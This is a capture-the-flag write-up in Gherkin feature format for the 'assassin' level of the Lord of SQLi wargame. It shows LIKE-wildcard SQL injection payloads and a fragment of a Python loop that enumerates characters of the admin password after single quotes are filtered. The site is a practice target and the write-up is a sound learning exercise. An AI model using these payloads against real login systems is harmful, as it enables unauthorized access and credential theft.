## Version 2.0
## language: en

Feature: assassin-sql-injection-lordofsqli
  Site:
    https://los.rubiya.kr/gate.php
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Login as admin

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | Windows         | 10 Pro              |
  | Firefox         | 74.0 (64-bit)       |

  Machine information:
    Given the challenge URL
    """
    https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php
    """
    When I open the url with Chrome
    Then I see the PHP code that validates the password
    And It shows the query made on the screen
    """
    select id from prob_assassin where pw like ''
    """
  Scenario: Fail:Sql-injection
    Given the PHP code
    And knowing that answer is correct when It returns:
    """
      ASSASSIN Clear!
    """
    When I try with a well known payload:
    """
      ?pw=%%%%%%%%
    """
    Then I get "Hello Guest"
    And I didn't solve it

   Scenario: Success:Sqli-boolean-exploitation
    Given that I inspected the code
    And I see that they validate the single quote character
    And also to pass the challenge I need something of the admin password
    """
    if(preg_match('/\'/i', $_GET[pw])) exit("No Hack ~_~");
    if($result['id'] == 'admin') solve("assassin");
    """
    Then I used the following to bypass the protections
    And to iterate through characters to get the characters of the passwords
    """
    ?pw=%A%
    """
    When I only get "Hello Guest" as the result
    Then I figured that the admin password contains the same characters
    And I modified the exploit to iterate through them [exploit.py]
    """
    CHARSS = "0129def"
    params = (
            ('pw', '%' + p + str(c) + '%'),
        )
    """
    Then get two characters belonging to the admin password
    And I solve the challenge
